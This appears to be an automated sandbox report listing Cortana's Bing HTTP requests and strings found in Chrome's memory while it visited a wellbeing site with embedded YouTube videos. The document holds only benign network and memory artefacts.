                                  Source: global traffic HTTP traffic detected: GET /rb/6h/cir3,ortl,cc,nc/ZSlq2MSN0MvVwI58OcghaoHmrE4.css?bu=M-cK4ArtCuAK0QvgCtcL4ArgCuAK4gvgCukL4ArvC-AK9QvgCvsL4Ar_CuAKhQvgCvkK4ArgCsgL4AqUC-AKmgvgCo4L4ArgCqoLrQvgCuAKxQuzC-AKuQu8C-AKpwzgCoEM4AriDA&or=w HTTP/1.1 host: www.bing.com accept: */* referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init accept-encoding: identity user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
                                  Source: global traffic HTTP traffic detected: GET /rb/6h/ortl,cc,nc/NajusmjIqB4kdLn9FmVxeS4xi2o.css?bu=Cc8M4ArgCuAK4ArgCuAK4ArgCg&or=w HTTP/1.1 host: www.bing.com accept: */* referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init accept-encoding: identity user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
                                  Source: global traffic HTTP traffic detected: GET /rb/6h/ortl,cc,nc/QNBBNqWD9F_Blep-UqQSqnMp-FI.css?bu=AeAK&or=w HTTP/1.1 host: www.bing.com accept: */* referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init accept-encoding: identity user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
                                  Source: global traffic HTTP traffic detected: GET /rp/3T8ucjQMb8BBehsODJAOjeNJF6s.js HTTP/1.1 host: www.bing.com accept: */* referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init accept-encoding: identity user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
                                  Source: global traffic HTTP traffic detected: GET /rp/9-pklorc79LFfCciVrUdpdbYMSU.js HTTP/1.1 host: www.bing.com accept: */* referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init accept-encoding: identity user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
                                  Source: global traffic HTTP traffic detected: GET /rp/BaYvmXn0q_Cf4wTJN2K9KdBrfbQ.js HTTP/1.1 host: www.bing.com accept: */* referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init accept-encoding: identity user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
                                  Source: global traffic HTTP traffic detected: GET /rp/BjLNboZeAl9CUzulz_BWYtAs2KI.js HTTP/1.1 host: www.bing.com accept: */* referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init accept-encoding: identity user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
                                  Source: global traffic HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=o&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=1&cvid=eb82c8e7c31b4b76bd657e149bcf58ff&ig=65dc22f5bae44905b431c10cc183a3ed HTTP/1.1 host: www.bing.com referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init accept: */* accept-language: en-CH x-agent-deviceid: 01000A41090080B6 x-bm-cbt: 1747926312 x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStore x-bm-dateformat: dd/MM/yyyy x-bm-devicedimensions: 784x640 x-bm-devicedimensionslogical: 784x640 x-bm-devicescale: 100 x-bm-dtz: -240 x-bm-market: CH x-bm-theme: 000000;0078d7 x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E x-device-clientsession: 545012EC6AF64F449D402DDDF0620E33 x-device-isoptin: false x-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A} x-device-ossku: 48 x-device-touch: false x-deviceid: 01000A41090080B6 x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-c x-msedge-externalexptype: JointCoord x-positionertype: Desktop x-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI x-search-cortanaavailablecapabilities: None x
                                  Source: global traffic HTTP traffic detected: GET /apc/trans.gif?b4b2360df62e9cf0666e60a982b91b70 HTTP/1.1 host: l-ring.msedge.net referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init accept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5 accept-language: en-CH accept-encoding: identity user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                  Source: global traffic HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=on&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=2&cvid=eb82c8e7c31b4b76bd657e149bcf58ff&ig=0638cfbb5a9041079ce3b71fd1168ee9 HTTP/1.1 host: www.bing.com referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init accept: */* accept-language: en-CH x-agent-deviceid: 01000A41090080B6 x-bm-cbt: 1747926312 x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStore x-bm-dateformat: dd/MM/yyyy x-bm-devicedimensions: 784x640 x-bm-devicedimensionslogical: 784x640 x-bm-devicescale: 100 x-bm-dtz: -240 x-bm-market: CH x-bm-theme: 000000;0078d7 x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E x-device-clientsession: 545012EC6AF64F449D402DDDF0620E33 x-device-isoptin: false x-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A} x-device-ossku: 48 x-device-touch: false x-deviceid: 01000A41090080B6 x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-c x-msedge-externalexptype: JointCoord x-positionertype: Desktop x-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI x-search-cortanaavailablecapabilities: None
                                  Source: global traffic HTTP traffic detected: GET /rp/Cj3ZU8zX_sufjrVdLFel-pJdQTs.js HTTP/1.1 host: www.bing.com accept: */* referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init accept-encoding: identity user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
                                  Source: global traffic HTTP traffic detected: GET /apc/trans.gif?64d45b2e0b5acbfe07e333093de52a06 HTTP/1.1 host: l-ring.msedge.net referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init accept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5 accept-language: en-CH accept-encoding: identity user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                  Source: global traffic HTTP traffic detected: GET /rp/Dn5Iypmm_cLV_tG2zZt_ZqSWy5o.js HTTP/1.1 host: www.bing.com accept: */* referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init accept-encoding: identity user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
                                  Source: chrome.exe, 00000000.00000003.2377647837.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377606221.000028EC053C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: text/html,$Science of THRIVE Approach - YouTubeE=https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2355407453.000028EC03A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2355372012.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: text/html,$Welcome to Thrive Learning - YouTubeE=https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2400466181.000028EC07EC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Approach to Wellbeing</p><p class=\"tlc-video-iframe\"><iframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR\" title=\"YouTube video player\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen=\"\"></iframe></p></div><div class=\"tlc-videos2\"><p>How can you tap into your own Fountain of Health? Watch below:</p><p class=\"tlc-video-iframe\"><iframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX\" title=\"YouTube video player\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen=\"\"></iframe></p></div><div class=\"tlc-videos3\"><p><span><strong>Dr. 
John Chiasson </strong></span>shares evidence and Thrive Learning Centre resources.</p><p class=\"tlc-video-iframe\"><iframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws\" title=\"YouTube video player\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen=\"\"></iframe></p></div></div></div></div>\n \n </section>\n\n<section class=\"block block-block-content block-block-contentf966ba8c-fc24-474a-8805-f39f333363d9 clearfix\">\n \n \n\n \n <div class=\"field field--name-body field--type-text-with-summary field--label-hidden field--item\"><div class=\"thrive-apprpach-img\"><p><img src=\"/sites/default/files/inline-images/leaves-banner-2_0_0.jpg\" data-entity-uuid=\"863dde25-bef3-486b-910c-2ecf2d16be0f\" data-entity-type=\"file\" width=\"2185\" height=\"305\"></p></div><div class=\"container tlc-wellbeing\"><div><div class=\"tlc-wellbeing-b2\"><h4>What is the THRIVE equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: HPX*"https://www.facebook.com/FOHThrive equals www.facebook.com (Facebook)
                                  Source: chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: PX`5-https://www.youtube.com/@fountainofhealth2679 equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2489590171.000028EC03E8C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: ","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2489590171.000028EC03E8C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: ","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}e} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2495865997.000028EC04894000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: ","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2393613989.000028EC04B35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2352226880.000028EC041A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2495865997.000028EC04894000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: "currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":fal equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: ( _keyhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/embed.js equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: ( http://localhost:64111/tabstatus//www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2495865997.000028EC04894000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: ("currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":fal equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: (42783B83FBBChttps://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2302567636.000028EC04908000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: (essageHandlerhttps://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2485632326.000028EC0380C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: (f/embedfdomainowww.youtube.com equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2490662725.000028EC03FB4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: (https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX" equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2487287792.000028EC03B44000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: (stAnimationFrame(functin(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2492215314.000028EC040DC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: (te Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2495235628.000028EC047BC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377119871.000028EC03B70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487353472.000028EC03B73000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: (www.youtube.com equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2341110796.000028EC06320000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: .slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2481950611.000028EC033E0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3A7000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: .www.youtube.com equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2505295670.000028EC07AAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504440794.000028EC078DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: .www.youtube.com equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2505295670.000028EC07AAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504440794.000028EC078DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: .www.youtube.com_KEY equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2342988019.000028EC063A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 18QIhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/base.js equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC1D000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: 20QIhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/base.js equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2501436245.000028EC06920000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: 3+https://www.youtube.com/generate_204?oFXXFw( ( equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2500594658.000028EC06708000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: 5https://www.youtube.com/^0https://fountainofhealth.ca equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2488945594.000028EC03E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: 7https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws equals www.youtube.com (Youtube)
YsOS4xN2wxLjQxLTEuNDFMMTIsMTAuNTkgbDIuODMtMi44M0wxNi4yNCw5LjE3eiBNNC45Myw0LjkzYy0zLjkxLDMuOTEtMy45MSwxMC4yNCwwLDE0LjE0YzMuOTEsMy45MSwxMC4yNCwzLjkxLDE0LjE0LDBjMy45MS0zLjkxLDMuOTEtMTAuMjQsMC0xNC4xNCBDMTUuMTcsMS4wMiw4LjgzLDEuMDIsNC45Myw0LjkzeiBNMTguMzYsNS42NGMzLjUxLDMuNTEsMy41MSw5LjIyLDAsMTIuNzNzLTkuMjIsMy41MS0xMi43Mywwcy0zLjUxLTkuMjIsMC0xMi43MyBDOS4xNSwyLjEzLDE0Ljg1LDIuMTMsMTguMzYsNS42NHoiIC8+PC9nPjwvc3ZnPg==","https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR|data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAADCCAYAAACIaaiTAAAAAXNSR0IArs4c6QAAARJJREFUOE9lyNdHBQAAhfHb3nvvuu2997jNe29TJJEkkkgSSSSJJJJEEkkiifRH5jsP56Xz8PM5gcC/xfCIWBNHiXiTQIlEk0SJZJNCiVRIM+mUyDCZlMgy2ZTIMbmUyDP5lCgwhZQoMsWUKDGllCgz5ZSogEpTRYlqU0OJoKmlRJ2pp0SDaaREk2mmRItppUSbaadEh+mkRBd0mx5K9Jo+SvSbAUoMmiFKDJsRSoyaMUqMmwlKhMwkJabMNCVmYNbMUSJsIpSImnlKLJhFSiyZZWoFVmEN1mEDNmELtmEHdmEP9uEADuEIjuEETuEMzuECLuEKruEGbuEO7uEBHuEJnuEFXuEN3uEDPuELvuEHfv8AoRErEi7Uc8UAAAAASUVORK5CYII="],"notVisible":false,"pdfViewerLoaded":false,"hasInputFields":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2343716935.000028EC04BCE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: = [];","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2323304427.000028EC06AA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: = [];","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2486385269.000028EC03974000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: =https://www.youtube.com/embed/FURi5aHg1g? equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470328399.000028EC025B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2341068096.000028EC06B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: =https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2341068096.000028EC06B20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484247572.000028EC036C8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: =https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX# equals www.youtube.com (Youtube)
